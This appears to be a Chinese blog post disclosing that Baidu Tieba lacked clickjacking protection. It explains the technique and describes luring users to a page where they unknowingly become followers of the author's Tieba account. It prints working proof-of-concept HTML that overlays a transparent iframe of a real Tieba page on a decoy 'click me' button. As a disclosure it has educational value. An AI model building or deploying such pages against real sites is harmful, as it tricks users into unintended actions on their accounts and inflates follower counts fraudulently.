标签:
百度贴吧没考虑点击劫持防御,可造成恶意刷粉丝。
估计很多地方都没考虑,还可以继续挖。
点击劫持(ClickJacking)是由互联网安全专家罗伯特.汉森和耶利米.格劳斯在2008年首创的。是一种视觉欺骗手段,在Web端就是Iframe嵌套一个透明不可见的页面,让用户在不知情的情况下,点击攻击者想要欺骗用户点击的位置。
百度贴吧页面没考虑该漏洞,可以导致恶意刷粉丝。
想象一下,我在某个大号下留个劲爆消息,诱导用户到我的域名点击按钮,最后大家都成我贴吧的粉丝了。
我的本地页面代码:
<html>
<head>
<meta charset="utf-8" />
<title>demo</title>
</head>
<div style="z-index:999;opacity:0.0;width:2000px; height:2500px;overflow:hidden;position:absolute;">
<iframe id="inner" style="position:absolute;top:0px;width:1500px;height:1500px;left:0px;" src="http://tieba.baidu.com/p/3564916309"></iframe>
</div>
<button id="click" style="cursor:pointer;z-index:10px;position:absolute;top:235px;left:438px;text-align:center;width:84px;height:35px;">点我试试</button>
</html>
标签:
原文地址:http://www.cnblogs.com/hackforfun/p/4391072.html
